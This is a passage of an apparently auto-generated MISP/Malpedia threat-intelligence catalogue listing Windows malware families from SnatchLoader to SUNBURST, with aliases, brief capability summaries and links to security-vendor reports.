https://twitter.com/VK_Intel/status/1191414501297528832

SnatchLoader

A downloader trojan with some infostealer capabilities focused on the browser. Previously observed as part of RigEK campaigns.

The tag is: misp-galaxy:malpedia="SnatchLoader"

SnatchLoader is also known as:

Table 2650. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch_loader
https://zerophagemalware.com/2017/12/11/malware-snatch-loader-reloaded/
https://www.youtube.com/watch?v=k3sM88o_maM
https://twitter.com/VK_Intel/status/898549340121288704
https://www.arbornetworks.com/blog/asert/snatchloader-reloaded/
https://myonlinesecurity.co.uk/your-order-no-8194788-has-been-processed-malspam-delivers-malware/

SNEEPY

The tag is: misp-galaxy:malpedia="SNEEPY"

SNEEPY is also known as:

ByeByeShell

Table 2651. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sneepy
https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/

Snifula

The tag is: misp-galaxy:malpedia="Snifula"

Snifula is also known as:

Ursnif

Table 2652. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.snifula
https://www.circl.lu/assets/files/tr-13/tr-13-snifula-analysis-report-v1.3.pdf
https://www.zdnet.com/article/ursnif-trojan-has-targeted-over-100-italian-banks/
https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/
https://www.darktrace.com/en/blog/the-resurgence-of-the-ursnif-banking-trojan/
https://malware.love/malware_analysis/reverse_engineering/2020/11/27/analyzing-a-vbs-dropper.html

Snojan

The tag is: misp-galaxy:malpedia="Snojan"

Snojan is also known as:

Table 2653. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.snojan
https://medium.com/@jacob16682/snojan-analysis-bb3982fb1bb9

SNS Locker

The tag is: misp-galaxy:malpedia="SNS Locker"

SNS Locker is also known as:

Table 2654. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.snslocker

Sobaken

According to ESET, this RAT was derived from (the open-source) Quasar RAT.

The tag is: misp-galaxy:malpedia="Sobaken"

Sobaken is also known as:

Table 2655. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sobaken
https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/

Sobig

The tag is: misp-galaxy:malpedia="Sobig"

Sobig is also known as:

Palyh

Table 2656. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sobig
http://edition.cnn.com/2003/TECH/internet/08/21/sobig.virus/index.html

Socelars

Socelars is an infostealer with main focus on: * Facebook Stealer (ads/manager) * Cookie Stealer | AdsCreditCard {Amazon}

The tag is: misp-galaxy:malpedia="Socelars"

Socelars is also known as:

Table 2657. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.socelars
https://twitter.com/VK_Intel/status/1201584107928653824
https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html
https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf
https://www.bleepingcomputer.com/news/security/facebook-ads-manager-targeted-by-new-info-stealing-trojan/

Socks5 Systemz

The tag is: misp-galaxy:malpedia="Socks5 Systemz"

Socks5 Systemz is also known as:

Table 2658. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.socks5_systemz

SocksBot

The tag is: misp-galaxy:malpedia="SocksBot"

SocksBot is also known as:

BIRDDOG
Nadrac

Table 2659. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.socksbot
https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf
https://www.accenture.com/t00010101T000000Zw/gb-en/_acnmedia/PDF-83/Accenture-Goldfin-Security-Alert.pdf[https://www.accenture.com/t00010101T000000Zw/gb-en/_acnmedia/PDF-83/Accenture-Goldfin-Security-Alert.pdf]
https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf
https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html

SodaMaster

This is a RAT that is usually loaded with one or more shellcode and/or reflective DLL injection techniques. The RAT uses RC4 or a hardcoded RSA key for traffic encryption/decryption. Its communication can either happen via a raw TCP socket or a HTTP POST request. Depending on the version, the RAT may remotely execute DLLs or shellcode.

The tag is: misp-galaxy:malpedia="SodaMaster"

SodaMaster is also known as:

DelfsCake
HEAVYPOT
dfls

Table 2660. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sodamaster
https://securelist.com/apt-trends-report-q1-2021/101967/
https://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_202_niwa-yanagishita_en.pdf

Solarbot

The tag is: misp-galaxy:malpedia="Solarbot"

Solarbot is also known as:

Napolar

Table 2661. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.solarbot
https://www.welivesecurity.com/2013/09/25/win32napolar-a-new-bot-on-the-block/
https://blog.malwarebytes.com/threat-analysis/2013/09/new-solarbot-malware-debuts-creator-publicly-advertising/
https://blog.avast.com/2013/09/25/win3264napolar-new-trojan-shines-on-the-cyber-crime-scene/

solarmarker

The tag is: misp-galaxy:malpedia="solarmarker"

solarmarker is also known as:

Jupyter
Polazert
Yellow Cockatoo

Table 2662. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.solarmarker
https://blog.morphisec.com/new-jupyter-evasive-delivery-through-msi-installer
https://www.binarydefense.com/mars-deimos-from-jupiter-to-mars-and-back-again-part-two/
https://security5magics.blogspot.com/2020/12/tracking-jupyter-malware.html
https://twitter.com/MsftSecIntel/status/1403461397283950597
https://www.esentire.com/security-advisories/hackers-flood-the-web-with-100-000-malicious-pages-promising-professionals-free-business-forms-but-are-delivering-malware-reports-esentire
https://blog.talosintelligence.com/2021/07/threat-spotlight-solarmarker.html#more
https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/
https://www.binarydefense.com/mars-deimos-solarmarker-jupyter-infostealer-part-1/

SombRAT

The tag is: misp-galaxy:malpedia="SombRAT"

SombRAT is also known as:

Table 2663. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sombrat
https://blogs.blackberry.com/en/2021/05/threat-thursday-sombrat-always-leave-yourself-a-backdoor
https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced

Sorano

The tag is: misp-galaxy:malpedia="Sorano"

Sorano is also known as:

Table 2664. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sorano
https://github.com/3xp0rt/SoranoStealer
https://3xp0rt.xyz/lpmkikVic
https://github.com/Alexuiop1337/SoranoStealer

soraya

The tag is: misp-galaxy:malpedia="soraya"

soraya is also known as:

Table 2665. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.soraya
https://www.codeandsec.com/Soraya-Malware-Analysis-Dropper

SoreFang

The tag is: misp-galaxy:malpedia="SoreFang"

SoreFang is also known as:

Table 2666. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sorefang
https://securelist.com/apt-trends-report-q3-2020/99204/
https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198a
https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development.pdf

Sorgu

The tag is: misp-galaxy:malpedia="Sorgu"

Sorgu is also known as:

Table 2667. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sorgu
https://symantec-blogs.broadcom.com/blogs/threat-intelligence/leafminer-espionage-middle-east
https://www.symantec.com/blogs/threat-intelligence/leafminer-espionage-middle-east

SOUNDBITE

The tag is: misp-galaxy:malpedia="SOUNDBITE"

SOUNDBITE is also known as:

denis

Table 2668. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.soundbite
https://go.recordedfuture.com/hubfs/reports/cta-2020-1110.pdf
https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection
https://www.secureworks.com/research/threat-profiles/tin-woodlawn
https://mp.weixin.qq.com/s/xPsEXp2J5IE7wNSMEVC24A
https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-1/
https://attack.mitre.org/wiki/Software/S0157
https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
https://ruxcon.org.au/assets/2017/slides/bart-RuxCon-Presentation.pptx
https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/

SPACESHIP

SPACESHIP searches for files with a specified set of file extensions and copies them to a removable drive. FireEye believes that SHIPSHAPE is used to copy SPACESHIP to a removable drive, which could be used to infect another victim computer, including an air-gapped computer. SPACESHIP is then used to steal documents from the air-gapped system, copying them to a removable drive inserted into the SPACESHIP-infected system

The tag is: misp-galaxy:malpedia="SPACESHIP"

SPACESHIP is also known as:

Table 2669. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.spaceship
https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

Spark

The tag is: misp-galaxy:malpedia="Spark"

Spark is also known as:

Table 2670. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.spark
https://www.cybereason.com/blog/new-malware-arsenal-abusing-cloud-platforms-in-middle-east-espionage-campaign
https://www.cybereason.com/blog/new-cyber-espionage-campaigns-targeting-palestinians-part-one
https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf
https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/

Sparkle

The tag is: misp-galaxy:malpedia="Sparkle"

Sparkle is also known as:

Table 2671. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sparkle
https://threatvector.cylance.com/en_us/home/reaver-mapping-connections-between-disparate-chinese-apt-groups.html

Sparksrv

The tag is: misp-galaxy:malpedia="Sparksrv"

Sparksrv is also known as:

Table 2672. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sparksrv
https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/luckycat-redux-campaign-attacks-multiple-targets-in-india-and-japan

SparrowDoor

The tag is: misp-galaxy:malpedia="SparrowDoor"

SparrowDoor is also known as:

FamousSparrow

Table 2673. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sparrow_door
https://www.welivesecurity.com/2021/09/23/famoussparrow-suspicious-hotel-guest/

Spartacus

Spartacus is ransomware written in .NET and emerged in the first half of 2018.

The tag is: misp-galaxy:malpedia="Spartacus"

Spartacus is also known as:

Table 2674. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.spartacus
https://bartblaze.blogspot.com/2018/04/this-is-spartacus-new-ransomware-on.html

Spedear

The tag is: misp-galaxy:malpedia="Spedear"

Spedear is also known as:

Table 2675. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.spedear
https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets

Spicy Hot Pot

The tag is: misp-galaxy:malpedia="Spicy Hot Pot"

Spicy Hot Pot is also known as:

Table 2676. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.spicyhotpot
https://www.crowdstrike.com/blog/spicy-hot-pot-rootkit-explained/

Spora

The tag is: misp-galaxy:malpedia="Spora"

Spora is also known as:

Table 2677. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.spora_ransom
https://nakedsecurity.sophos.com/2017/06/26/how-spora-ransomware-tries-to-fool-antivirus/
https://blog.malwarebytes.com/threat-analysis/2017/03/spora-ransomware/
https://www.linkedin.com/pulse/spora-ransomware-understanding-hta-infection-vector-kevin-douglas
https://www.gdatasoftware.com/blog/2017/01/29442-spora-worm-and-ransomware
https://github.com/MinervaLabsResearch/SporaVaccination
http://malware-traffic-analysis.net/2017/01/17/index2.html

SpyBot

The tag is: misp-galaxy:malpedia="SpyBot"

SpyBot is also known as:

Table 2678. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.spybot

Spyder

The tag is: misp-galaxy:malpedia="Spyder"

Spyder is also known as:

Table 2679. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.spyder
https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan/
https://hello.global.ntt/-/media/ntt/global/insights/white-papers/the-operations-of-winnti-group.pdf
https://securitynews.sonicwall.com/xmlpost/chinas-winnti-spyder-module/
https://st.drweb.com/static/new-www/news/2021/march/BackDoor.Spyder.1_en.pdf

SpyEye

SpyEye is a malware targeting both Microsoft Windows browsers and Apple iOS Safari. Originated in Russia, it was available in dark forums for $500+ claiming to be the "The Next Zeus Malware". It performed many functionalities typical from bankers trojan such as keyloggers, auto-fill credit card modules, email backups, config files (encrypted), http access, Pop3 grabbers and FTP grabbers. SpyEye allowed hackers to steal money from online bank accounts and initiate transactions even while valid users are logged into their bank account.

The tag is: misp-galaxy:malpedia="SpyEye"

SpyEye is also known as:

Table 2680. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.spyeye
https://www.symantec.com/connect/blogs/spyeye-bot-versus-zeus-bot
https://securelist.com/financial-cyberthreats-in-2020/101638/
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FSpyeye
https://www.sans.org/reading-room/whitepapers/malicious/clash-titans-zeus-spyeye-33393
https://krebsonsecurity.com/2010/09/spyeye-botnets-bogus-billing-feature/
https://www.computerworld.com/article/2509482/spyeye-trojan-defeating-online-banking-defenses.html
https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree
https://www.pcworld.com/article/247252/spyeye_malware_borrows_zeus_trick_to_mask_fraud.html
https://krebsonsecurity.com/2011/04/spyeye-targets-opera-google-chrome-users/
http://malwareint.blogspot.com/2010/02/spyeye-bot-part-two-conversations-with.html
https://krebsonsecurity.com/2010/04/spyeye-vs-zeus-rivalry/
https://www.justice.gov/opa/pr/four-individuals-plead-guilty-rico-conspiracy-involving-bulletproof-hosting-cybercriminals

Squirrelwaffle

The tag is: misp-galaxy:malpedia="Squirrelwaffle"

Squirrelwaffle is also known as:

Table 2681. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.squirrelwaffle
https://github.com/0xjxd/SquirrelWaffle-From-Maldoc-to-Cobalt-Strike/raw/main/2021-10-02%20-%20SquirrelWaffle%20-%20From%20Maldoc%20to%20Cobalt%20Strike.pdf
https://www.malware-traffic-analysis.net/2021/09/17/index.html
https://www.zscaler.com/blogs/security-research/squirrelwaffle-new-loader-delivering-cobalt-strike
https://elis531989.medium.com/the-squirrel-strikes-back-analysis-of-the-newly-emerged-cobalt-strike-loader-squirrelwaffle-937b73dbd9f9
https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-custom-packer/
https://www.cynet.com/understanding-squirrelwaffle/
https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot
https://twitter.com/Max_Mal_/status/1442496131410190339
https://security-soup.net/squirrelwaffle-maldoc-analysis/
https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-main-loader/
https://www.youtube.com/watch?v=9X2P7aFKSw0

SquirtDanger

The tag is: misp-galaxy:malpedia="SquirtDanger"

SquirtDanger is also known as:

Table 2682. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.squirtdanger
https://researchcenter.paloaltonetworks.com/2018/04/unit42-squirtdanger-swiss-army-knife-malware-veteran-malware-author-thebottle/

SSHNET

The tag is: misp-galaxy:malpedia="SSHNET"

SSHNET is also known as:

Table 2683. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sshnet
https://www.zdnet.com/article/fbi-says-an-iranian-hacking-group-is-attacking-f5-networking-devices
https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign.pdf
https://www.crowdstrike.com/blog/who-is-pioneer-kitten/

SslMM

The tag is: misp-galaxy:malpedia="SslMM"

SslMM is also known as:

Table 2684. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sslmm
https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/TheNaikonAPT-MsnMM1.pdf
https://securelist.com/analysis/publications/69953/the-naikon-apt/
https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

Stabuniq

The tag is: misp-galaxy:malpedia="Stabuniq"

Stabuniq is also known as:

Table 2685. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.stabuniq
http://contagiodump.blogspot.com/2012/12/dec-2012-trojanstabuniq-samples.html
https://www.symantec.com/connect/blogs/trojanstabuniq-found-financial-institution-servers

StalinLocker

The tag is: misp-galaxy:malpedia="StalinLocker"

StalinLocker is also known as:

StalinScreamer

Table 2686. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.stalin_locker
https://www.bleepingcomputer.com/news/security/stalinlocker-deletes-your-files-unless-you-enter-the-right-code/

Stampedo

The tag is: misp-galaxy:malpedia="Stampedo"

Stampedo is also known as:

Table 2687. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.stampedo
https://www.bleepingcomputer.com/news/security/stampado-ransomware-campaign-decrypted-before-it-started/

StarCruft

The tag is: misp-galaxy:malpedia="StarCruft"

StarCruft is also known as:

Table 2688. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.starcruft
https://securelist.com/operation-daybreak/75100/

StarLoader

The tag is: misp-galaxy:malpedia="StarLoader"

StarLoader is also known as:

Table 2689. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.starloader
https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments

StarsyPound

The tag is: misp-galaxy:malpedia="StarsyPound"

StarsyPound is also known as:

Table 2690. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.starsypound
https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf

StartPage

Potentially unwanted program that changes the startpage of browsers to induce ad impressions.

The tag is: misp-galaxy:malpedia="StartPage"

StartPage is also known as:

Easy Television Access Now

Table 2691. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.startpage
https://www.bleepingcomputer.com/virus-removal/remove-search-searchetan.com-chrome-new-tab-page

STASHLOG

Malware that abuses the Common Log File System (CLFS) to store/hide a second stage payload via registry transaction files.

The tag is: misp-galaxy:malpedia="STASHLOG"

STASHLOG is also known as:

Table 2692. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.stashlog
https://twitter.com/ESETresearch/status/1433819369784610828
https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html

StealBit

This is a stealer used by LockBit 2.0.

The tag is: misp-galaxy:malpedia="StealBit"

StealBit is also known as:

Corrempa

Table 2693. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.stealbit
https://yoroi.company/research/hunting-the-lockbit-gangs-exfiltration-infrastructures/
https://twitter.com/r3c0nst/status/1425875923606310913

StealthWorker Go

The tag is: misp-galaxy:malpedia="StealthWorker Go"

StealthWorker Go is also known as:

Table 2694. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.stealthworker
https://www.bleepingcomputer.com/news/security/synology-warns-of-malware-infecting-nas-devices-with-ransomware/
https://blog.malwarebytes.com/threat-analysis/2019/02/new-golang-brute-forcer-discovered-amid-rise-e-commerce-attacks/

SteamHide

Malware written in .NET that hides in Steam profile pictures. Tries to evade virtualization through detection if it is executed within VMWare or VirtualBox.

The tag is: misp-galaxy:malpedia="SteamHide"

SteamHide is also known as:

Table 2695. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.steamhide
https://www.gdatasoftware.com/blog/steamhide-malware-in-profile-images

StegoLoader

The tag is: misp-galaxy:malpedia="StegoLoader"

StegoLoader is also known as:

Table 2696. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.stegoloader
https://www.secureworks.com/research/stegoloader-a-stealthy-information-stealer

Stinger

The tag is: misp-galaxy:malpedia="Stinger"

Stinger is also known as:

Table 2697. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.stinger

StoneDrill

The tag is: misp-galaxy:malpedia="StoneDrill"

StoneDrill is also known as:

Table 2698. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.stonedrill
https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf
https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

STOP

STOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file’s name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.

The tag is: misp-galaxy:malpedia="STOP"

STOP is also known as:

Djvu
KeyPass

Table 2699. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.stop
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf
https://www.bleepingcomputer.com/news/security/djvu-ransomware-spreading-new-tro-variant-through-cracks-and-adware-bundles/
https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware
https://www.gdata.de/blog/1970/01/-35391-finger-weg-von-illegalen-software-downloads
https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/
https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a
https://securelist.com/keypass-ransomware/87412/
https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf
https://cybleinc.com/2021/06/21/djvu-malware-of-stop-ransomware-family-back-with-new-variant/

Stration

The tag is: misp-galaxy:malpedia="Stration"

Stration is also known as:

Table 2700. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.stration

Stresspaint

The tag is: misp-galaxy:malpedia="Stresspaint"

Stresspaint is also known as:

Table 2701. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.stresspaint
https://arstechnica.com/information-technology/2018/04/tens-of-thousands-of-facebook-accounts-compromised-in-days-by-malware/
https://www.bleepingcomputer.com/news/security/stresspaint-malware-steals-facebook-credentials-and-session-cookies/
https://security.radware.com/malware/stresspaint-malware-targeting-facebook-credentials/
https://blog.radware.com/security/2018/04/stresspaint-malware-campaign-targeting-facebook-credentials/

StrongPity

The tag is: misp-galaxy:malpedia="StrongPity"

StrongPity is also known as:

Table 2702. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.strongpity
https://anchorednarratives.substack.com/p/tracking-strongpity-with-yara
https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://anchorednarratives.substack.com/p/recover-your-files-with-strongpity
https://0xthreatintel.medium.com/uncovering-apt-c-41-strongpity-backdoor-e7f9a7a076f4
https://twitter.com/physicaldrive0/status/786293008278970368
https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/
https://cybleinc.com/2020/12/31/strongpity-apt-extends-global-reach-with-new-infrastructure/
https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
https://mp.weixin.qq.com/s/5No0TR4ECVPp_Xv4joXEBg
https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html
https://securelist.com/blog/research/76147/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/

Stuxnet

The tag is: misp-galaxy:malpedia="Stuxnet"

Stuxnet is also known as:

Table 2703. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.stuxnet
https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf
https://www.spiegel.de/netzwelt/web/die-erste-cyberwaffe-und-ihre-folgen-a-a0ed08c9-5080-4ac2-8518-ed69347dc147
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
https://fmmresearch.files.wordpress.com/2020/09/theemeraldconnectionreport_fmmr-2.pdf
https://www.codeproject.com/articles/246545/stuxnet-malware-analysis-paper
https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://medium.com/s2wlab/w3-may-en-story-of-the-week-code-signing-certificate-on-the-darkweb-94c7ec437001
https://www.welivesecurity.com/media_files/white-papers/Stuxnet_Under_the_Microscope.pdf
https://fmmresearch.wordpress.com/2020/09/28/the-emerald-connection-equationgroup-collaboration-with-stuxnet/
https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf
https://news.yahoo.com/revealed-how-a-secret-dutch-mole-aided-the-us-israeli-stuxnet-cyber-attack-on-iran-160026018.html
http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html
https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf
https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf

SUCEFUL

The tag is: misp-galaxy:malpedia="SUCEFUL"

SUCEFUL is also known as:

Table 2704. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.suceful
https://www.fireeye.com/blog/threat-research/2015/09/suceful_next_genera.html
https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf

SUNBURST

FireEye describes SUNBURST as a trojanized SolarWinds digitally-signed component of the Orion software framework that contains a backdoor that communicates via HTTP to third party servers. After an initial dormant period of up to two weeks, it uses a DGA to generate specific subdomains for a set C&C domain. The backdoor retrieves and executes commands, that include the ability to transfer files, execute files, profile the system, reboot the machine, and disable system services. The C2 traffic to the malicious domains is designed to mimic normal SolarWinds API communications: Orion Improvement Program (OIP) protocol. The backdoor uses multiple obfuscated blocklists to identify forensic and anti-virus tools running as processes, services, and drivers. Multiple trojanzied updates were digitally signed from March - May 2020 and posted to the SolarWinds updates website.

The tag is: misp-galaxy:malpedia="SUNBURST"

SUNBURST is also known as:

Solorigate

Table 2705. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.sunburst
https://www.brighttalk.com/webcast/7451/462719
https://us-cert.cisa.gov/remediating-apt-compromised-networks
https://www.bleepingcomputer.com/news/security/the-solarwinds-cyberattack-the-hack-the-victims-and-what-we-know/
https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/
https://www.microsoft.com/en-us/security/business/threat-protection/solorigate-detection-guidance
https://www.netresec.com/?page=Blog&month=2020-12&post=Extracting-Security-Products-from-SUNBURST-DNS-Beacons
https://netresec.com/?b=212a6ad
https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/
https://ics-cert.kaspersky.com/reports/2021/01/26/sunburst-industrial-victims/
https://github.com/github/codeql/tree/main/csharp/ql/src/experimental/Security%20Features/campaign
https://us-cert.cisa.gov/ncas/alerts/aa20-352a
https://www.domaintools.com/resources/blog/continuous-eruption-further-analysis-of-the-solarwinds-supply-incident
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/additional-analysis-into-the-sunburst-backdoor/
https://twitter.com/cybercdh/status/1339241246024404994
https://www.trustedsec.com/blog/solarwinds-backdoor-sunburst-incident-response-playbook/?hss_channel=tw-403811306
https://www.brighttalk.com/webcast/7451/469525
https://prevasio.com/static/web/viewer.html?file=/static/Anatomy_Of_SolarWinds_Supply_Chain_Attack.pdf
https://www.sans.org/webcasts/contrarian-view-solarwinds-119515
https://mp.weixin.qq.com/s/v-ekPFtVNZG1W7vWjcuVug
https://blog.truesec.com/2021/01/07/avoiding-supply-chain-attacks-similar-to-solarwinds-orions-sunburst
https://blog.prevasio.com/2020/12/sunburst-backdoor-part-ii-dga-list-of.html
https://www.solarwinds.com/securityadvisory
https://netresec.com/?b=211f30f
https://drive.google.com/file/d/1R79Q1oC18GmKK8FYBoYEt0vYF7SpsvQI/view
https://github.com/sophos-cybersecurity/solarwinds-threathunt
https://www.mfa.gov.lv/en/news/latest-news/67813-latvia-s-statement-following-the-announcement-by-the-united-states-of-actions-to-respond-to-the-russian-federation-s-destabilizing-activities
https://twitter.com/megabeets_/status/1339308801112027138
https://www.youtube.com/watch?v=GfbxHy6xnbA
https://www.youtube.com/watch?v=cMauHTV-lJg
https://twitter.com/0xrb/status/1339199268146442241
https://netresec.com/?b=211cd21
https://threatconnect.com/blog/tracking-sunburst-related-activity-with-threatconnect-dashboards
https://www.youtube.com/watch?v=dV2QTLSecpc
https://github.com/RedDrip7/SunBurst_DGA_Decode
https://youtu.be/SW8kVkwDOrc?t=24706
https://www.domaintools.com/resources/blog/the-devils-in-the-details-sunburst-attribution
https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714
https://www.cyborgsecurity.com/cyborg_labs/threat-hunt-deep-dives-solarwinds-supply-chain-compromise-solorigate-sunburst-backdoor/
